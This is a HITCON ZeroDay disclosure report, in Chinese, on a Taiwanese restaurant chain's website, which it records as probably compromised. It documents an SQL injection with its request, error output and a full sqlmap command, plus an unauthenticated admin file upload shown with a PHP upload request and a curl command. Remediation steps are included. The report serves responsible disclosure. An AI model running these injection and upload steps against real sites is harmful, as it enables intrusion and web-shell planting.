饗食天堂 已被入侵之事件 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00270
  • Vendor: 饗食天堂
  • Title: 饗食天堂 已被入侵之事件
  • Introduction: 經典的組合攻擊技能: SQLi + 常見後台 + 後門上傳

處理狀態

目前狀態

公開
Last Update : 2016/12/03
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2016/10/12 11:27:44 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/10/12 11:28:29 : 新提交 (由 HITCON ZeroDay 平台自動更新)
  • 2016/10/12 22:20:17 : 審核完成 (由 HITCON ZeroDay 平台自動更新)
  • 2016/10/12 22:31:09 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/10/12 22:31:18 : 通報未回應 (由 HITCON ZeroDay 平台自動更新)
  • 2016/10/12 22:31:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/10/13 01:24:32 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/10/13 01:24:36 : 修補中 (由 HITCON ZeroDay 平台自動更新)
  • 2016/11/29 13:10:40 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/11/29 18:44:20 : 確認已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/03 03:00:02 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00270
  • 通報者:chris ([email protected])
  • 風險:嚴重
  • 類型:疑似遭入侵 (Probably Hacked)

參考資料

伺服器遭到入侵,例如頁面遭植入惡意程式、後門頁面等。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.eatogether.com.tw/onlinepayment.php
http://www.eatogether.com.tw/admin/banner_list.php

http://xkow4dnkw7cusncz.onion/viewtopic.php?f=9&t=3810

敘述

整體建議:

1. 修正全站可能存在的 SQLi、XSS 以及權限跨越等弱點
2. 刪除 /upload 目錄以及子目錄底下所有的 CSV、PHP 檔案
    2.1 /upload/news/*.php*
    2.2 /upload/coupon/*.php*
    2.3 /upload/prod/*.php*
    2.4 /upload/bar/*.php*
3. 強制重新設定前台會員以及後台管理員的登入密碼
4. 使用更安全的雜湊函數, 並避免存放明文密碼於資料庫

1 SQL Injection

漏洞位置: 網站首頁 > 團體訂位線上付訂
漏洞網址: http://www.eatogether.com.tw/onlinepayment.php?mID=9
備註說明: 建議全站都需要檢查 GET、POST、Cookies 以及 User-Agent 等傳參

網頁請求:

POST /onlinepayment.php?mID=9 HTTP/1.1
Host: www.eatogether.com.tw
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Connection: close

rsargs[]=1'6&rsargs[]=2016-10-13&rsargs[]=1&rsargs[]=0912345678&rs=loadOrder&rst=&rsrnd=1476200754123

網頁回應:

HTTP/1.1 200 OK
Date: Wed, 12 Oct 2016 02:12:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=ue2rso04g29ou10b372b6bar6tqdsmd2; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 423
Connection: close
Content-Type: text/html

+:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6' AND udate='2016-10-13' AND mealTimes='1' AND phone='0912345678' AND (status=0' at line 1<br>SELECT * FROM orders WHERE shopID='1'6' AND udate='2016-10-13' AND mealTimes='1' AND phone='0912345678' AND (status=0) AND boxID=0 AND orderCancel=0 AND deposit>0 AND depositStatus>0<br>

測試語法:

sqlmap.py -u "http://www.eatogether.com.tw/onlinepayment.php?mID=9" --data "rsargs[]=16&rsargs[]=2016-10-11&rsargs[]=1&rsargs[]=0912345678&rs=loadOrder&rst=&rsrnd=147620075412" -p "rsargs[]" --batch --random-agent --tamper "space2mysqlblank.py" --tech "E" --dbms "MySQL" -v 3 --current-db --current-user --is-dba

2 權限驗證缺失

漏洞位置: 網站後台 > 抬頭圖示 > 新增圖示
漏洞網址: http://www.eatogether.com.tw/admin/banner_list.php?MID=13
備註說明: 該頁面僅在 GET 請求時檢查是否存在登入權限, POST 上傳檔案時則未確實檢查

網頁請求: 略, 同下網頁請求
網頁回應: 略, 同下網頁回應
測試語法: 略, 同下測試語法

3 任意檔案上傳

漏洞位置: 網站後台 > 抬頭圖示 > 新增圖示
漏洞網址: http://www.eatogether.com.tw/admin/banner_list.php?MID=13
備註說明: 僅在前端以 chkPICfileType() 檢查檔案副檔名, 後端則未有任何驗證

網頁請求:

POST /admin/banner_list.php?MID=13 HTTP/1.1
Host: www.eatogether.com.tw
Content-Length: 186
Content-Type: multipart/form-data; boundary=----
Cookie: PHPSESSID=
Connection: close

------
Content-Disposition: form-data; name="run"

1
------
Content-Disposition: form-data; name="photo"; filename="GG.php"
Content-Type: image/jpeg

<?php phpinfo();
--------

網頁回應:

HTTP/1.1 302 Found
Date: Wed, 12 Oct 2016 02:22:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ?msgs=MDros4fmlpnlhLLlrZjmiJDlip8=
Content-Length: 0
Connection: close
Content-Type: text/html

測試語法:

curl http://www.eatogether.com.tw/admin/banner_list.php?MID=13 -F [email protected]

擷圖

留言討論

;